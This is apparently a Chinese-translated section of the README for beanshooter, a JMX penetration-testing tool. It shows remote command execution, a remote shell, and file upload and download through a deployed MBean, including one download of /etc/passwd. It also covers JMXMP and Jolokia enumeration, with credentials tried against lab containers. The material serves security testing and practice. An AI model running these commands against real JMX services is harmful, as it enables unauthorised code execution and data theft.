[root@d475fdb21692 /usr/local/tomcat]$ id
uid=0(root) gid=0(root) groups=0(root)
该操作滥用了Apache Tomcat的UserDatabase MBeanwrite中的编码错误。我们报告了该错误,但未将其视为安全漏洞。为了写入任意位置,beanshooter需要更改__UserDatabase 的位置。在写入所需文件后,所有更改都会恢复,但在生产环境中仍要小心。
Tonka
TonkaBean是由beanshooter项目实现的自定义MBean,它允许在JMX服务器上_访问_文件系统和执行命令。可以通过使用 operation 访问其操作,然后使用所需的操作。tonka
Tonka Exec
该exec操作可用于在JMX服务上调用单个命令:
[qtc@devbox ~]$ beanshooter tonka exec 172.17.0.2 9010 id
[+] Invoking the executeCommand method with argument: id
[+] The call was successful
[+]
[+] Server response:
uid=0(root) gid=0(root) groups=0(root)
exec 操作的最后一个参数应该是一个字符串。当--shell未使用该选项时,此字符串将按空格拆分(引号感知)并作为数组传递给ProcessBuilder 服务器端的类。
如果--shell使用了,则指定的 shell 字符串将按空格拆分,并将生成的数组与指定的参数字符串连接起来,然后再将其传递给类ProcessBuilder。这允许使用正确解释的 shell 特殊字符执行类似于 shell 的操作:
[qtc@devbox ~]$ beanshooter tonka exec 172.17.0.2 9010 --shell 'ash -c' 'echo $HOSTNAME'
[+] Invoking the executeCommand method with argument: ash -c echo $HOSTNAME
[+] The call was successful
[+]
[+] Server response:
fee2d783023b
为方便起见,常见的 shell 会自动以所需的命令字符串参数作为后缀。因此,--shell ash自动转换为--shell 'ash -c'.
Tonka Execarray
该execarray操作与 action 非常相似exec,但不是期望一个字符串作为参数并在空格上拆分该字符串以构造命令数组,该execarray操作允许指定多个参数,这些参数直接用作该类的命令数组ProcessBuilder:
[qtc@devbox ~]$ beanshooter tonka execarray 172.17.0.2 9010 -- ash -c 'echo $HOME'
[+] Invoking the executeCommand method with argument: ash -c echo $HOME
[+] The call was successful
[+]
[+] Server response:
/root
Tonka Shell
该操作生成一个命令外壳,您可以在其中指定在JMXshell服务器上执行的命令 。shell 不是完全交互的,只是代表Java 方法的包装器。但是,实现了对环境变量和当前工作目录的基本支持: Runtime.exec
[qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010
[root@172.17.0.2 /]$ id
uid=0(root) gid=0(root) groups=0(root)
[root@172.17.0.2 /]$ cd /home
[root@172.17.0.2 /home]$ !env test=example
[root@172.17.0.2 /home]$ echo $test
example
上面的示例演示了如何使用!env关键字设置环境变量。除了此关键字外,还有其他几个关键字可用:
[qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010
[root@172.17.0.2 /]$ !help
Available shell commands:
<cmd> execute the specified command
cd <dir> change working directory on the server
exit|quit exit the shell
!help|!h print this help menu
!environ|!env <key>=<value> set new environment variables in key=value format
!upload|!put <src> <dst> upload a file to the remote MBeanServer
!download|!get <src> <dst> download a file from the remote MBeanServer
!background|!back <cmd> executes the specified command in the background
Tonka Upload
该upload操作可用于将文件上传到JMX服务器:
[qtc@devbox ~]$ beanshooter tonka upload 172.17.0.2 9010 file.dat /tmp
[+] Uploading local file /home/qtc/file.dat to path /tmp on the MBeanSerer.
[+] 33 bytes were written to /tmp/file.dat
Tonka Download
该download操作可用于从JMX服务器下载文件:
[qtc@devbox ~]$ beanshooter tonka download 172.17.0.2 9010 /etc/passwd
[+] Saving remote file /etc/passwd to local path /home/qtc/passwd
[+] 1172 bytes were written to /home/qtc/passwd
JMXMP
JMX服务可以使用不同的连接器类型。目前最常用的连接器是Java RMI,它允许访问基于Java RMI协议的__JMX。另一个流行的连接器是JMX 消息协议 ( JMXMP ),尽管它已经过时,但仍然经常遇到。beanshooter具有内置的JMXMP支持,并在使用以下选项时尝试通过JMXMP进行连接:--jmxmp
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4444 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+] - Remote JMXMP server does not use SASL.
[+] Login is possible without specifying credentials.
[+] Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - JMXMP serial check is work in progress but endpoints are usually vulnerable.
[+] Configuration Status: Undecided
[+]
[+] Checking available MBeans:
[+]
[+] - 22 MBeans are currently registred on the MBean server.
[+] Found 0 non default MBeans.
经过身份验证的JMXMP端点通常使用SASL进行保护。启用SASL后,JMX端点通常需要客户端连接到特定的SASL 配置文件。beanshooter的可用配置文件是:
- plain
- digest
- cram
- ntlm
- gssapi
通过使用选项,它们中的每一个都可以选择与TLS配对--ssl。在受SASL保护的 JMXMPenum端点上使用操作时,beanshooter会尝试枚举所需的SASL配置文件。 虽然通常可以确定所需的SASL机制,但无法枚举所需的TLS设置:
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4449 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+] - Remote JMXMP server uses SASL/NTLM SASL profile.
[+] Notice: TLS setting cannot be enumerated and --ssl may be required.
[+] Vulnerability Status: Non Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - JMXMP serial check is work in progress but endpoints are usually vulnerable.
[+] Configuration Status: Undecided
Jolokia 支持
从v4.0.0开始,beanshooter支持基于Jolokia 的JMX 端点。建立与基于Jolokia的端点的连接需要通常的目标格式和--jolokia标志:
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 8080 --jolokia --username manager --password admin
[+] Checking specified credentials:
[+]
[+] - Login successful! The specified credentials are correct.
[+] Username: manager - Password: admin
[+]
[+] Checking Jolokia Version:
[+]
[+] - Agent Version 1.7.1 - Protocol Version: 7.2
[+] Vulnerability Status: Non Vulnerable
[+]
[+] Checking whether Jolokia Proxy Mode is enabled:
[+]
[+] - Jolokia Proxy Mode is enabled! You may connect to backend JMX services.
[+] Vulnerability Status: Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+] - 75 MBeans are currently registred on the MBean server.
[+] Listing 56 non default MBeans:
...
由于Jolokia的功能集有限,并非所有的beanshooter操作都受支持。如果您有任何问题,请查阅Jolokia 常见问题解答。为了玩弄 Jolokia,beanshooter提供了一个示例服务器,它在端口上 公开了一个Jolokia8080端点。此外,可以在端口上找到基于常规RMI的__JMX1090端点。
Docker镜像
从版本开始v3.1.1,beanshooter也可以作为 docker 镜像使用,并且可以从GitHub 容器注册表中提取 。对于每个版本,都有一个普通版本和一个精简版本可用。两者都提供了beanshooter的完整工作版本 ,但只有普通版本附带了ysoserial ,导致图像尺寸更大:
docker pull ghcr.io/qtc-de/beanshooter/beanshooter:3.1.1-121MBdocker pull ghcr.io/qtc-de/beanshooter/beanshooter:3.1.1-slim-61.9MB
您还可以通过运行以下命令自行构建容器:
[user@host ~]$ git clone https://github.com/qtc-de/beanshooter
[user@host ~]$ cd beanshooter && docker build -t beanshooter .
示例服务器
上面给出的大多数示例都基于jmx-example-server 和tomcat-example-server。这些服务器包含在docker文件夹中的此存储库中,可用于练习JMX枚举。您可以自己构建相应的容器,也可以直接从GitHub Container Registry加载它们。
版权所有 2023,Tobias Neitzel 和beanshooter贡献者。